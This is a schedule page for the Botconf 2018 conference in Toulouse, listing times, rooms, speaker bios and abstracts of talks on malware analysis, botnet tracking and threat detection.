Botconf 2018 has ended

Log in to bookmark your favorites and sync them to your phone or calendar.

Tuesday, December 4

10:00 CET

11:00 CET

12:30 CET

14:00 CET

14:00 CET

WS3 - Detect, Investigate and Respond using MISP, TheHive & Cortex

Raphaël VINOT

CERT Operator & MISP core developper, CIRCL
I'm one of the core developer of MISP Threat Sharing and especially working on all the APIs and interactions with 3rd party tools.

Tuesday December 4, 2018 14:00 - 18:00 CET
GEI Insa Toulouse - Room C 135 Avenue de Rangueil, Toulouse, France
Wednesday, December 5

08:30 CET

09:45 CET

avatar for Éric FREYSSINET


Chairman / Head of the national focal point on cyberthreats, Botconf / Gendarmerie nationale
Chairman of the organising committee. French law enforcement cybercrime specialist. PhD in computer science.

Wednesday December 5, 2018 09:45 - 10:20 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

10:20 CET

Swimming in the Cryptonote Pools
In the world of cryptocurrency-related malware, mining currencies based on cryptonote technology like Monero (XMR) is a growing threat for organizations. We can observe that interest in such cryptocurrencies has increased dramatically for malicious actors those past months because of the specificities of this technology. 

In this talk we will explain why such cryptocurrencies are appealing for malicious actors, and how to leverage publicly available sources for hunting of such related activities.

Wednesday December 5, 2018 10:20 - 11:00 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

11:00 CET

APT Attack against the Middle East: The Big Bang
Over the past few weeks, we discovered the comeback of an APT attack against the Middle East, and specifically against the Palestinian Authority. 

The APT group behind this attack launched a campaign over a year ago, and very little of this operation was seen in the wild since. The renewed Big Bang campaign incorporates improved capabilities, wider functionalities, and a more offensive infrastructure. It also seems to have very specific targets in mind. 

Shared interests and malware features with campaigns belonging to the Gaza Cybergang that emerged in both 2017 and 2018 show that the infamous threat group is most likely behind this attack. 

Although the APT has gone through significant upgrades over the last year, the conductors maintained evident and peculiar fingerprints. Both the delivery methods and the malicious artifacts had unique traces which helped us link the current wave to past attacks. 

Among the techniques attributed to the APT group, one could find fake news websites containing up-to-date articles, well-formulated e-mails with malicious attachments or embedded links, and mobile applications posing as legitimate services. All of these methods are meant to filter-in targeted victims that meet predefined characteristics and lead to a custom-made reconnaissance malware. 

During our investigation, we were able to spot only three instances of the renewed operation, but distinctive characteristics in the command and control websites revealed a wider infrastructure that may serve unknown samples. While our analysis covered the capabilities of the malware, we are certain that this is a part of an ongoing multi-staged attack, the full infection chain of which has not been completed yet. 

The campaign earned its name due to the authors’ affection for the successful TV series “The Big Bang Theory” as reflected in their function naming standard. The malware code is decorated with the character names of the popular series, but also actors of the Turkish series “Resurrection: Ertugrul”. 

In our presentation we will cover the operation of this group, focusing on the recent improvements and tactics, as well as the techniques and procedures (TTPs) that identified this group both in previous attacks and in the current one.



Malware Analyst, Check Point

Wednesday December 5, 2018 11:00 - 11:30 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

11:30 CET

Code Cartographer’s Diary
At last year’s Botconf, we have launched Malpedia [1], our community-driven approach to create a free and independent resource for rapid identification and actionable context when investigating malware. While only touching the surface of analysis possibilities last time (mostly surveying PE header characteristics), we want to take a deep dive in this talk, showing the results of more than two years of ongoing in-depth analysis efforts. This time, the focus will be set on the unpacked representatives of more than 700 families of Windows malware. 

In the first part of this presentation, we will investigate the usage patterns of the Windows API as exposed by malware. For this, we extend ApiScout [2] with a method to extract API usage fingerprints. We will demonstrate how this information can be used to reliably identify and characterize malware families and that this information seems to capture habits of their respective authors to some degree. 

In the second part, we will introduce SMDA [3], a minimalist recursive disassembler library that is optimized for accurate Control Flow Graph (CFG) recovery from memory dumps. SMDA’s output allows us to create a function index, which can be used to identify similar code. On the one hand, we can use this similarity information to recognize and measure how commonly 3rd party libraries are used in malware. On the other hand, we can also isolate the unique, characteristic code for families in order to derive detection signatures for them. 

[1] https://malpedia.caad.fkie.fraunhofer.de 
[2] https://github.com/danielplohmann/apiscout 
[3] https://github.com/danielplohmann/smda  

avatar for Daniel Plohmann

Daniel Plohmann

Fraunhofer FKIE
Malware analyst at Fraunhofer FKIE

Wednesday December 5, 2018 11:30 - 12:30 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

12:30 CET

Cutting the Wrong Wire: how a Clumsy Attacker Revealed a Global Cryptojacking Campaign
We have seen a massive spike in malicious crypto mining campaigns killing themselves for the chance to have their victim’s CPU. The shorter and shorter time window between vulnerability disclosure and cryptojacking opportunistic attacks taking advantage of them may help us to understand how profitable they are to the point of getting priority over ransomware attacks. This article consists of a walk-through on a remarkable incident caused by an eager and clumsy attacker which ended up revealing multiple cryptojacking campaigns targeting large organizations across the world in early 2018.


Wednesday December 5, 2018 12:30 - 12:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

12:50 CET

14:00 CET

Chess with Pyotr


Dr. Brett Stone-Gross has more than 10 years of experience in computer security. He specializes in malware analysis, reverse engineering, and attack attribution. He has collaborated with many leading security experts to disrupt large-scale cybercriminal operations, including botnets... Read More →

Wednesday December 5, 2018 14:00 - 15:00 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

15:00 CET

In-depth Formbook Malware Analysis
Form-grabber malware are nowadays quite common. They provide simple yet effective methods for stealing infected users' credentials. They are named thereby since they target HTML forms' submissions, made by web-browsers. Sometimes, they also provide classical password stealer capabilities such as key-logging, or modules designed to take screenshots. Also, they can embed code for harvesting users applications’ passwords, stored on the file-system.

Formbook is a 'ready-to-use' form-grabber malware, sold illegally on hacking forums. Thus, it can be used by cyber-criminals who don’t necessary own skills in malware development, although it can still be used by more advanced actors. It comes with a PHP web-application, used to implement the C&C server. It also offers a panel, used to graphically manage infected computers, and visualize stolen data.

In order to evade anti-viruses detection, to detect automated malware analysis environments or to complicate its reverse-engineering, Formbook implements many tricks. It also uses interesting code injection techniques, based on APC injection and thread hijacking, to perform actions like process-creation, from within the context of legitimate windows processes such as explorer. Its ability to migrate from a 32-bit process, running in wow64 compatibility mode, to a native 64-bit process also makes it worth looking at.


Wednesday December 5, 2018 15:00 - 15:40 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

15:40 CET

How Much Should You Pay for your own Botnet ?
Cloud computing provides scalable and on-demand infrastructure, which seems to be the perfect way to host a botnet. This paper focuses on cloud-based botnets to perform legal DDoS resilience tests. We model the cost of such botnets and provide both technical and economical insights into their usage for controlled DDoS attacks. While these purpose-built botnets appear to be more expensive than online DDoS booter services, they remain affordable in the context of legal audits.

avatar for Antoine REBSTOCK


Cyberdefense Engineer Apprentice, 6cure
Cyber security engineering student at Ecole Nationale Supérieure d'Ingénieurs de Bretagne Sud (ENSIBS), in apprenticeship at 6cure (company specialized in defense against DDoS attacks).

Wednesday December 5, 2018 15:40 - 16:10 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

16:10 CET

16:40 CET

Collecting Malicious Particles from Neutrino Botnets
Neutrino Bot (also known and detected as Win/Kasidet) is a rapidly changing threat. It first became known around December 2013. It has been actively developed ever since resulting in version 5.4 at the very beginning of 2018. From the early times, when the bot’s commands were focused on various DDoS attacks, it evolved into something quite different. Its current state allows to remotely execute commands, files, scan the infected system and both modify and monitor network traffic while keeping some of the old tricks as well.
In the talk, we would like to look at different versions of the bot and their specifics and describe the changes that are being made. We will also explain its current functionality and transition into a fully functional banking trojan.
The malware is affordable and relatively cheap which leads to many independent actors operating their botnets in a very different way. That said, it is much more interesting to learn what each group leverages the bot for rather than tracking it as a whole.
Identifying similar configurations is not always easy, but there are several ways to do so. We want to demonstrate the methods of how to detect which samples belong to each other in order to identify different botnets. We will show the botnets that have been discovered during the last year, what is typical for them, how do they use the bot and what have they delivered through it. We will also lighten the mood with several examples of situations, when operators failed to execute their malicious activities properly by utilizing wrong configuration or harmless webinjects.
No centralized distribution method is offered, that means every botnet operator has to distribute the bot on his own. The discovered methods include malvertising, trojanized installers or the Ammyy supply chain attack.

avatar for Jakub Souček

Jakub Souček

Malware Analyst, ESET
Jakub Souček works at ESET as malware analyst since 2015. He specializes in deep analysis of malware and botnet activity tracking. In his free time, he likes to play games, watch movies or listen to some good old music.
avatar for Jakub TOMANEK


Malware analyst, ESET
Jakub Tomanek is a malware analyst at ESET. He has no conference experience so far. His work consists of analyzing recent malicious samples and monitoring their activity. In his free time, he enjoys playing the violin and riding a bike.

Wednesday December 5, 2018 16:40 - 17:20 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

17:20 CET

Trickbot The Trick is On You!
Bot malware landscape always changes with both new and old families being updated with new techniques to perform cybercrime. And due to their sheer number, manually analysing and tracking them is a tedious affair. This entails delayed response to the threat. Because of this, automated systems have become an integral part of malware research to learn more about these commonly on-and-off malware operations. Data obtained from these systems can be indispensable for planning and implementing counter moves against the threat. In this way, we can lessen the gap between threat discovery and mitigation. 

With the same motivation, we have conducted research on Trickbot family, which has become one of the most popular botnet families since its first discovery in 2016. It has evolved with new modules being added to its arsenal for spreading and stealing more information from its victims. Up to this day we are seeing new campaigns and modules being distributed in the wild. 
What got us really interested in this malware is its refined network behaviour and more importantly its wide variety of modules that it distributes to its victims. Its rotating C2 servers and by-command delivery of its modules make manual analysis and monitoring extremely tedious. We thought this is a good opportunity to create a tracker system to monitor the malware 
Trickbot’s infrastructure relies in its modular infection distributed via its own network protocol under TLS. This eventually became our entry point in gathering data from its own servers. 

In this presentation, we will discuss Trickbot’s behaviour. More importantly, we will also be focusing on the procedures we took to design and build the monitoring system including the challenges we encountered along the way. This will rely heavily on reverse engineering its network communication and how we were able to use its own protocol to obtain specific artefacts from its servers. 
As a result of the data we gathered, we will share statistics and the information generated from the tracker and how they can be used to help mitigate the threat automatically.

Wednesday December 5, 2018 17:20 - 17:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

17:50 CET

Automation, structured knowledge in Tactical Threat Intelligence
The connected societies facing ever evolving risks, traditional cyber security solutions have been charged by the popular jury for incompetence. Yet they are working for what they have been designed for, the rise of targeted attacks as well as the maturation of advanced cybercrime force defenders to find new ways of fighting the ghosts in the machines. Cyber Threat Intelligence has emerged for about a decade now, bringing new mind-set, tools and methods to the overall InfoSec community. After reminded what composed this activity, this conceptual presentation will focus on Tactical Threat Intelligence. By diagnosing that adversaries’ behaviour analysis has been mainly hijack to provide technical indicators and strategic feedback, we will review today’s methods and tools used
for cyber threat profiling and express the limitation or problematics they brought to Intelligence Tradecraft specialist. Moves by the impression that today’s Tactical Threat Intelligence is rarely as a say derived into action, we will finally explore new leads that could bring the discipline more operational concretisation and will help tactical analyst is the difficult path to automate tasks in a very psychological influenced domain.

avatar for Ronan MOUCHOUX


Security Researcher, GReAT, Kaspersky Lab
Ten years working in various position in the information security field, from SOC to CERT, from solution design to Cyber Threat Intelligence. As a Security Researcher at GReAT Kaspersky Labs, I spend most of my time to research and develop Tactical Threat Intelligence capabilities... Read More →

Wednesday December 5, 2018 17:50 - 18:30 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

18:45 CET

avatar for Airbus


With 700 experts dedicated to cyber security, Airbus CyberSecurity offers its expertise and trusted European solutions to its customers: defense and security organisations, governments, and CNI operators.Through its Cyber Defence Centres established in France, Germany and the United-Kingdom, Airbus proposes a services and products offer dynamically comb... Read More →

Thursday, December 6

08:30 CET

09:00 CET

Internals of a Spam Distribution Botnet
Cybercriminals use different methods to distribute malware like malicious advertisements, Exploit Kits, loaders or spam campaigns. Unless an attack is really targeted the bad guys will try to infect as many computers as possible and they need some automation for that. It is well-known that they use botnets to distribute malware and create spam campaigns. Popular malware families like Necurs, Cutwail, Onliner Spambot or Emotet are examples of this kind of botnets, which are not usually analyzed deeply because we tend to focus on the final malware families which are spread, like bankers, stealers or RATs. This talk will focus on one these malware families used to send spam, Onliner Spambot, explaining internal details about its different modules, its control panel, how it is checking and misusing stolen credentials, and about the threat actors who are operating it and selling it. Malware distribution is an interesting part of the cybercrime ecosystem and it is important to pay attention to those distribution botnets too.

avatar for Jose Miguel ESPARZA

Jose Miguel ESPARZA

Head of Threat Intelligence, Blueliv

Thursday December 6, 2018 09:00 - 09:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

09:50 CET

Botception: Botnet distributes script with bot capabilities
Monitoring botnets is a crucial component of cybersecurity, but it’s not everyday we see a botnet spreading scripts with bot capabilities. At the end of April 2018, while monitoring one of the branches of the Necurs botnet, we observed new scripts being distributed by the botnet.

In our presentation we will dive into the results of our analysis of scripts with bot capabilities, spread by a botnet. The analyzed scripts were spread by the Necurs botnet through spam emails, and while the initial infection chain was rather short, the multiple stages thereafter included capabilities to make it a fully fledged botnet.

The distribution of the these scripts is an interesting step out from the standard behavior of the Necurs botnet, and we will therefore share information about the Necurs’ branch we are monitoring, the changes it underwent in a year, and detailed analysis of the script bot itself. As the code involved in the infection chain was not heavily obfuscated, the analysis will be interlaced with code examples.

Our analysis provides detailed information about the function and behavior of the scripts, the origin of the information and a comparison of the scripts’ versions over time. After we explore the scripts’ whereabouts, we will again dive more deeply into the Ammyy-like malware infection chain.



Malware Analysis Team Lead, Avast Software s.r.o
avatar for Adolf Středa

Adolf Středa

Malware Researcher, Avast Software s.r.o.

Thursday December 6, 2018 09:50 - 10:20 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

10:20 CET

Stagecraft of Malicious Office Documents – A Look at Recent Campaigns
Malicious office documents have become a favorite malware delivery tool for malware authors. We have observed an increase in use of malicious documents over past 4 years. 30% of the malware blocked by Zscaler Cloud Sandbox since 2017 are malicious office documents. Malicious office documents are used for the delivery of crimeware payloads and are also often involved in Advanced Persistent Threats (APT) attacks. Over the time, these malicious office documents have used various obfuscation, encryption and evasion techniques to prevent detection. In this paper, we will provide a detailed analysis of different obfuscation, encryption, exploits and evasion techniques used in these malicious documents. We have analyzed over one thousand malicious documents from fifty different campaigns for this study. This research paper also lists the different malware samples delivered by these malicious documents and the use of powershell as well as other scripting languages.


Deepen DESAI

Deepen Desai is responsible for running the security research operations at Zscaler ThreatLabZ. Deepen has been actively involved in the field of Threat Research and Analysis from past 15 years. He is passionate about building new detection modules to counter evolving threat landscape... Read More →
avatar for Tarun DEWAN


Zscaler Softech India Pvt Ltd
I am working in malware analysis industry from last 6.8yrs. Currently I am in Zscaler as Sr.Senior Security Researcher and previously I worked with Norman and Mcafee. In my free time I love to play cricket and listen songs.

Dr. Nirmal SINGH

Sr. Manager, Security Research, Zscaler
Nirmal Singh is Sr. Manager for security research team at Zscaler ThreatLabZ located at Chandigarh, India. Nirmal has PhD in computer science and working in Threat Research and Analysis field from past 10 years. He oversees malware research, detection and innovation at Zscaler. Prior... Read More →

Thursday December 6, 2018 10:20 - 10:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

10:50 CET

11:10 CET

Hunting and Detecting APTs using Sysmon and PowerShell Logging
Many security professionals and Blue Team members appreciate a good and detailed written APT report by any renowned security company. This is especially true, if they document and explain some new and stealthy technique that was used and not well known yet by defenders.

One such technique is "WMI event subscription" for persistence, which has been used by APT29.
Another one is the "Logon Script" technique ("UserInitMprLogonScript" reg key) used by APT28.
A third technique that is discussed very often is (ab-)using Powershell and "living off the land" (LOL).
To even top this one, attackers are using "unmanaged Powershell" (e.g. using PowerPick) to evade command line based detection. But thanks to the Powershell logging features available since version 5, even this can be detected.

I will discuss and show how to detect all of these techniques by using Sysmon data and Powershell logging (with Splunk as a SIEM).

avatar for Tom UELTSCHI


APT Hunter, Swiss Post

Thursday December 6, 2018 11:10 - 11:50 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

11:50 CET

Hunting for Silence
avatar for Rustam Mirkasymov

Rustam Mirkasymov

Head of dynamic analysis department, Group-IB

Thursday December 6, 2018 11:50 - 12:40 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

12:45 CET

14:00 CET

14:40 CET

Everything Panda Banker
The Panda Banker malware was first spotted in the wild in early 2016. It has since seen consistent development, gained a significant threat actor user base, and has become one of the most advanced and persistent banking malwares in the current threat landscape. This presentation compiles together the author's research and tracking of Panda Banker complemented with the prior work of other malware researchers studying the threat. Its aim is to provide a detailed survey of everything Panda Banker: what it is, where did it come from, what it does, how it works, who's using it, how effective they are, who is being targeted, and where is it going. The hope is for researchers and defenders to walk away with a better understanding of Panda Banker and maybe some ideas on how to better detect and mitigate it.


Thursday December 6, 2018 14:40 - 15:10 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

15:10 CET

16:00 CET

16:30 CET

The Dark Side of the ForSSHe
In February 2014, ESET researchers from Montreal published a report on a group who compromised more than 40,000 Linux servers worldwide since 2011. ESET named this campaign Windigo. At the centre of this operation, Ebury, an OpenSSH backdoor which allowed the attackers to remotely take control of compromised servers as well as stealing login credentials (passwords, keys) which were then used to connect to other servers. This simple yet effective method allowed them to extend their network of compromised servers.

Thursday December 6, 2018 16:30 - 17:20 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

17:20 CET

Lightning talks
avatar for Éric FREYSSINET


Chairman / Head of the national focal point on cyberthreats, Botconf / Gendarmerie nationale
Chairman of the organising committee. French law enforcement cybercrime specialist. PhD in computer science.

Thursday December 6, 2018 17:20 - 18:15 CET
Auditorium Marthe Condat 118 Route de Narbonne, 31400 Toulouse, France

19:00 CET

avatar for Éric FREYSSINET


Chairman / Head of the national focal point on cyberthreats, Botconf / Gendarmerie nationale
Chairman of the organising committee. French law enforcement cybercrime specialist. PhD in computer science.

avatar for Facebook


Founded in 2004, Facebook’s mission is to give people the power to build community and bring the world closer together. People use Facebook to stay connected with friends and family, to discover what’s going on in the world, and to share and express what matters to them... Read More →
avatar for Google


Google‘s mission is to organize the world’s information and make it universally accessible and useful. Through products and platforms like Search, Maps, Gmail, Android, Google Play, Chrome and YouTube, Google plays a meaningful role in the daily lives of billions of people and has become... Read More →
avatar for Talos


Talos is Cisco’s industry-leading threat intelligence team that protects your organization’s people, data and infrastructure from active adversaries. The Talos team collects information about existing and developing threats, and provides comprehensive protection against more attac... Read More →

Thursday December 6, 2018 19:00 - 23:30 CET
Friday, December 7

08:45 CET

09:20 CET

WASM Security Analysis Reverse Engineering
WebAssembly(WASM) is a new technology designed for browers. It aims to define a portable, size- and load-time-efficient binary format to serve as a compilation target which can be compiled to execute at native speed by taking advantage of common hardware capabilities available on a wide range of platforms, including mobile and IoT.
Our presentation will cover a brief introduction of this technology, analysis with or without access to the source code. It will also cover security issues and how it can be used by a botnet.



China, nsfocus
security researcher focused on ddos and threat intelligence analysit

09:50 CET

Red Teamer 2.0: Automating the C&C Set up Process
 This talk follows the amazing documentation provided by Steve Borosh (@424f424f) and Jeff Dimmock's (@bluscreenofjeff) on their dedicated repo.
Besides, it follows several experiences of red team operations leveraging the tips issued by these authors.
We will describe a new open source tool, whose name will be revealed during the presentation. That tool aims at managing red teams’ operations, and, in particular enables Command and Control infrastructure set up automation.

avatar for Charles IBRAHIM


Senior consultant, Wavestone
I believe in hard-work, reliability, and human relationships.From a more "computer science" point of view, I am (obviously if you've read my experience) fond of systems and networks security, and wish constantly to improve my limited skills.I pretend to be a developer, aim at being... Read More →

10:10 CET

Mirai: Beyond the Aftermath
Two years have passed since Mirai unleashed its wrath to the world by targeting high profile victims. Many things have happened since then, the good, the author responsible has already been convicted, the bad, source code was released to the public, and the not so bad, organizations became aware of the threat and geared up their defences for the possible next attack. Question is now, what’s next after Mirai? Ever since the release of its source code, many have used, experimented, and modified the code for their own liking and purpose. These so called Mirai copycats all want to have a piece of the IoT pie, battling to compromise more vulnerable IoT devices to grow their own army of bots and become Mirai’s possible heir. This research on the aftermath of Mirai will focus on three technical aspects: Mirai variants with their significant modifications, a genealogy of all Mirai variants identified so far, and if whether other botnets have reuse some of Mirai’s code.
To begin with, we will talk on the added techniques implemented to the variants to infect more IoT devices, like an exhaustive factory default credentials set, the use of both known and unknown exploits and targeting more architectures. We will also present the new ways it monetizes IoT bots like by targeting miners or using them as proxy.
The research as of now identified already 100 variants and still counting. We will discuss on how we automatically decrypt and dump the configuration for easy family identification and C2 extraction. Additionally, to have a better overview and understanding of the variants we will compare all of them and see how they relate to each other.
A botnet that we observed reusing Mirai’s code is Hide ‘N Seek. We will take a look at its modules and compare it to Mirai whether the configuration encryption algorithm is still the same.
To finish the presentation, we will share interesting insights, findings and lessons learned in the research and how these can help researchers in their threat Intel tasks.


10:40 CET

11:10 CET

Leaving no Stone Unturned – in Search of HTTP Malware Distinctive Features
 When we analyze malware C&C network traffic we often see that it contains HTTP protocol. Sometimes the messages are obfuscated and sometimes sent as plain text. They can be intentionally crafted to look like sent by a web browser. But in many cases they are sent using standard libraries and tools. Intuition suggests that there should be some distinct features, which can help to distinguish between malware and benign applications sending HTTP requests. In our presentation we want to present results of our analysis in search of such features.
Analyzed features include headers’ appearance (misspellings, unusual names), header values, general payload analysis (entropy, character analysis etc.) and header sequence order. In our search we have analyzed more than 35 000 pcap files from CERT Polska’s sandbox environment and Malware Capture Facility Project. They include network traffic of about 190 malware families, splitted into common categories like bankers, ransomware, downloader, spambot etc. To identify distinct features, we have compared the results against browser traffic to Alexa’s top 500 popular domains worldwide. The outcome was surprising even for us.

The presentation won’t be academic. We want to share main conclusions which can help you when dealing with malware HTTP traffic. To provide even more operational knowledge, we want to compare the results with traffic generated by popular Windows HTTP libraries and tools. Also we will present particularly interesting examples of HTTP anomalies, both in malware and benign traffic.


11:50 CET

Let’s Go with a Go RAT!
The Go language (GoLang) is an open source programming language developed by Google Inc. in 2009, and it can be run on various platforms such as Linux, Mac, Windows, Android.
Speaking of malware using Golang, Mirai is one of the famous one (they use it for the C2 program), but malware such as Encriyoko, Lady, GoARM.Bot, Go Athena RAT and others are also confirmed.
However, we can't say that Golang malware is commonly used as development basis for malware coding when looking at the ratio of popular malware.

In this presentation, we would like to introduce the analysis result of a new malware, we called it as "WellMess" that was coded on Golang on multiple platform operating systems. This malware was used by several incident cases that we confirmed from January 2018, we recognize it as a new malware according to our team's analysis and the traffic generated on its communication to the C2 servers.
Additionally, we will perform reverse engineering explanation of the WellMess malware and perform demonstration on its botnet operation.


Yoshihiro ISHIKAWA

Cyber Threat Analyst, LAC
Yoshihiro Ishikawa is a member of the Cyber Emergency Center of LAC, he has been engaged in malware analysis and cyber threat intelligence. Especially involved in analyzing incidents of Advanced Persistant Thread (APT) attacks. He presented at APCERT, HITCON. He is also currently... Read More →

Shinichi NAGANO

LAC Co.,Ltd.
Shinichi Nagano is a member of the Cyber Emergency Center with the background as Network Forensic Analyst and he now becomes one of malware analysis team of LAC, along with the Malware Analyst he analyzed various of malware and network log threat specially incidents.

12:20 CET

Tracking Actors through their Webinjects
Webinjects have been a feature of banking malware ever since they were popularised with great success by early families such as Zeus. In that time writing Webinjects has become a highly specialized skill with off-the-shelf Webinjects systems becoming as popular as the banking malware itself.

Webinjects are used to deploy Automated Transfer Systems, payment card data harvesters, session hijackers, and even to deploy web based crypto-currency miners. With some vendors in operation for over five years, the area of Webinjects development appears to be a lucrative and potentially long-lived occupation.

This presentation explores prevalent Webinjects systems, their capabilities and which malware families are deploying them, and how we can use Webinjects to track actors as they switch between using different malware families. We present details of the criminal groups we have discovered this way.


13:00 CET

14:00 CET

Triada: the Past, the Present, the (Hopefully not Existing) Future
Triada is an Android threat known within the malware research field for a couple of years. Despite that, it still remains a very interesting threat as their authors did something very rarely seen in any malicious software - instead of evading detection they embraced it. Triada was first detected preinstalled on the system image of some Android low-end devices in mid-2017.

As soon as we detected these applications, we reached out to OEM partners to address this threat and we gained a unique insight into Triada’s evolution and tactics. This presentation will cover Google Play Protect’s findings and present previously unrevealed aspects of Triada and the extent to which it backdoored OEM system images. We will also cover how our unprecedented coordination with OEMs led us to update system images across the Android ecosystem.


Łukasz Siewierski

Reverse Engineer, Google
Łukasz is a Reverse Engineer on the Android Security team at Google, where he takes apart malware and figures out how to stop it from working. Previously he was taking apart security incidents at the .pl domain registry, figuring out how to prevent them from happening in the future... Read More →

14:45 CET

The Snake Keeps Reinventing Itself
After having tracked Turla's activities for several years, we now have a unique understanding of their Tools, Tactics and Procedures (TTPs). In this talk, we would like to share this knowledge to help defenders protect their networks.

Turla is an espionage group known for targeting governments, diplomats and militaries all around the world. One of their first documented campaign was against the US military ten years ago and they are still very active. During this presentation, we will discuss some recent public cases involving Turla operators. This threat actor targets very specific group of people and, as such, use advanced targeting techniques such as spear phishing and watering hole to go after them.

We will present an in-depth analysis of currently undocumented components, such as a highly resilient Outlook backdoor, allegedly used in the early-2018 attack against the German government. We will also provide an overview of the different changes in their TTPs that occurred in the past few months.


Matthieu Faou

Malware Researcher, ESET
Matthieu Faou is a malware researcher at ESET where he performs in-depth analysis of malware. He finished his Master’s degree in computer science at École Polytechnique de Montréal and at École des Mines de Nancy in 2016. In the past, he has presented at conferences such as BlueHat... Read More →

15:30 CET

How many Mirai variants are there?
Mirai was soon open-sourced after overwhelming several high-profile targets including Krebsonsecurity, OVH, and DYN in Autumn 2016, which leads to a proliferation of Mirai variants in the past 2 years. For better fight against Mirai botnets, effective variant classification schemes are very necessary. Currently, Mirai variants are usually classified with their branch names (e.g., JOSHO, OWARI, MASUTA) which come from a command line of “/bin/busybox <branch >” found in the Mirai sample. While the default name is “MIRAI”, the <branch> was usually replaced with an author interested one (e.g., MASUTA, SATORI, SORA) in later variants.
However, we think branch-based classification scheme is too coarse-grained to reveal: 1) the variances in single variant of different stages, and 2) the connections among different branches. In this talk, we would like to present our classification schemes concluded from 32K+ collected samples and 1,000+ extracted CNCs. Our schemes are mainly based on the data of configurations, supported attack methods, and credential dictionaries, which are all extracted from the samples. For example, we successfully classify Mirai samples into 106 variants based on the combination of supported attack methods. We also successfully connected multiple branches based on the keys used in configuration encryption. To summarize, the content of this talk is as follows:
1)We will demonstrate the idea of automatically extracting configurations, supported attack methods, and credential dictionaries from samples for classification purpose.
2)We will propose a fingerprint technique to recognize Mirai attack methods (e.g., syn_flood, http_flood) with information extracted from samples without reverse engineering work.
3)We will introduce a set of classification schemes based on the extracted data, and will investigate popular Mirai branches with proposed schemes.

It’s worth mentioning that since the used data is processor-independent (e.g., x86, x64, ARM, MIPS, SPARC, PowerPC), our schemes can classify the same variant’s samples even if they are for different CPU architectures.



Qihoo 360
Botnet researcher @ Network Security Research Lab, Qihoo 360

Hui Wang

Qihoo 360

16:00 CET

Closing ceremony
avatar for Éric FREYSSINET


Chairman / Head of the national focal point on cyberthreats, Botconf / Gendarmerie nationale
Chairman of the organising committee. French law enforcement cybercrime specialist. PhD in computer science.